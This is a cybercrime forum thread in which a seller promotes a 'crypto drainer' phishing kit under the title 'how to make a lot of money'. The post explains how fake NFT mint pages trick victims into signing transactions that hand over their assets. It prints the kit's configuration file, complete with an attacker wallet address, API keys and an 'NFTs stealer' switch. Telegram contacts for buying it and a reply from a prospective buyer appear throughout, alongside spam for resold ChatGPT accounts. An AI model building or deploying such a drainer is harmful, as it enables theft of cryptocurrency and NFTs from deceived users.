Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 41589

PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

by honeyman1 - 30 April, 2023 - 05:15 PM
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.090
Posts
31
Threads
1 Year of service
#1
(This post was last modified: 29 August, 2024 - 09:28 PM by honeyman1. Edited 2 times in total.)
HI Guys [Image: ?u=https%3A%2F%2Fmedia.nulled.to%2Fpubli...Fheart.png] 
The 
honeymanOne team welcomes you . We specialize in it-crypto, our services include: development of crypto projects and all kinds of custom smart contracts

 
Our previous Thread provided an overview of Web3 phishing techniques and tactics. Today, we offer a deeper dive into a specific category of Web3 phishing pages called “Crypto Drainers” and one of the more prolific actors behind them. We will see how one Crypto Drainer template was responsible for over 2,000 ETH in losses in a short period of time.
Crypto Drainers are phishing pages that lure victims into signing malicious transactions that allow the attacker to siphon their crypto and NFTs. Typically these websites piggyback off of well known or emerging NFT projects. The websites themselves are primarily promoted via spam campaigns on social networks and Discord.
 
The way most crypto drainers work is relatively straight forward:
 
 
  1. Fake NFT minting pages with an artificial countdown to create urgency.

  2. Victim connects their wallet to “mint”.

  3. Check if the victim address owns any valuable NFTs.

  4. Victim signs transaction(s) to transfer ownership of NFTs.

  5. Victim sends a transaction to the attacker for the cost of the fake “mint”, but this transaction is not a contract interaction.

  6. Rinse & repeat.
 
 
Let's look at our old example:
 
 [Image: 1*emPPp1m_nP3uewvyjlp6mw.png]
 
Here’s the real website for comparison:
[Image: 1*IFIE9pcg2hZk1-c8gtGB5w.png]

When we look at the code under the hood of the malicious site, we find that the whole thing is templated and includes deployment instructions, but more on that later. For now, let’s take a peak at how this thing works.
 
First we have settings.js which acts as a config file. The comments are not ours, but part of the Crypto Drainer template
 
Code:
 
[align=left]const address = "0x237f0A6c126F979cEd363079f7Cc0bB848e1802B";
const infuraId = "6d233bb428724900aa1d6ac6bba531b1" // Infuria ID | https://infura.io/ | For Wallet Connect
const moralisApi = "8lLcZsKmH7Scwxzqp7O3REOhP8nGAMh9CjJTjKwVMQzYJ16fKNs9rClIsQOq0kyx" // x-api-key | https://moralis.io/ | For NFTs

const collectionInfo = {
name: "Amazing Pandaverse",
title: "Amazing Pandaverse", // Title prefix (ex "Buy your {name}") - You can use {name} to insert the collection name
socialMedia: {
discord: "https://discord.com/invite/amazingpandaverse",
twitter: "https://twitter.com/amazing_pndv",
},
medias: {
preview: "preview.gif",
favicon: "logo.png",
},
background: {
type: "image", // Supported types: image, video, color
image: "background.jpg", // Image for image type, video preview for video type
video: "background.mp4", // If you don't use video, you can ignore this line
color: "#4E4E6D", // If you don't use color, you can ignore this line
}
}
const mintInfo = {
price: 0.089, // Price per NFT.[/align]
[align=left]totalSupply: 8888, // Total supply of NFTs.[/align]
[align=left]minUnits: 1, // Min units to buy.
maxUnits: 10, // Max units to buy.
askMintLoop: true, // If true, when the user closes the metamask popup, it reopens automatically.
}

const nftsInfo = {
active: true, // Active (true) or not (false) NFTs stealer.
minValue: 0.1, // Minimum value of the last transactions (in the last 'checkMaxDay' days) of the collection.
checkMaxDay: 7, // Maximum number of days to check for the last transactions.
receiveAddress: "" // leave empty if you want to use the same address
}

/*
= = = = = END OF SETTINGS = = = = =
*/

//#region Check Configuration
if (mintInfo.minUnits > mintInfo.maxUnits) console.error(`Error: minUnits (${mintInfo.minUnits}) is greater than maxUnits (${maxUnits})`);
if (mintInfo.minUnits <= 0) console.error(`Error: minUnits (${mintInfo.minUnits}) is less than or equal to 0`);

if (!address.startsWith("0x") ||
(
address.length >= 64 ||
address.length <= 40
)
) console.error(`Error: ${address} is not a valid Ethereum address.`);
//#endregion[/align]

Telegram- @honeyman1
 
And then we have index.js which includes the code responsible for the actual draining:
Show ContentSpoiler:
We are not going to look at the code line by line, but it is worth highlighting two sections. These we will talk about in the next part
My current contacts for our products and other issues: TG honeyman1  [Image: pepeokay.png]

This is a bump
Honeypot Contract | Crypto Project | Drainer | Cryptocurrency Exchange | Exchangers | Crypto Wallet | Scam

- My Personal Telegram:
honeymanOne
 
- My Telegram Channel:
 honeyman_community
This post is by a banned member (CrackedSlave) - Unhide
1.108
Posts
172
Threads
5 Years of service
#2
thanks so much for sharing HQ content
HQ ChatGPT Plus Accounts for just 
1.1$ @anonXmo
https://slaveshop.sellpass.io/

[Image: giphy.gif]
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.090
Posts
31
Threads
1 Year of service
#3
(This post was last modified: 30 April, 2023 - 06:22 PM by honeyman1. Edited 1 time in total.)
(30 April, 2023 - 05:37 PM)CrackedSlave Wrote: Show More
thanks so much for sharing HQ content

thanks  Heart
Honeypot Contract | Crypto Project | Drainer | Cryptocurrency Exchange | Exchangers | Crypto Wallet | Scam

- My Personal Telegram:
honeymanOne
 
- My Telegram Channel:
 honeyman_community
This post is by a banned member (jpegaddict) - Unhide
22
Posts
0
Threads
1 Year of service
#4
thanks for the info, interesting to see how these work in detail it helps for those interested in buying
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.090
Posts
31
Threads
1 Year of service
Bumped #5
(This post was last modified: 01 May, 2023 - 11:46 PM by honeyman1.)
(01 May, 2023 - 03:38 PM)jpegaddict Wrote: Show More
thanks for the info, interesting to see how these work in detail it helps for those interested in buying

Thanks for the idea! We will definitely do it. If you want to know more, just message us on telegram.

tg - @ honeyman1


This is a bump
Honeypot Contract | Crypto Project | Drainer | Cryptocurrency Exchange | Exchangers | Crypto Wallet | Scam

- My Personal Telegram:
honeymanOne
 
- My Telegram Channel:
 honeyman_community
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.090
Posts
31
Threads
1 Year of service
Bumped #6
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.090
Posts
31
Threads
1 Year of service
Bumped #7
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.090
Posts
31
Threads
1 Year of service
Bumped #8
This is a bump

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 4 Guest(s)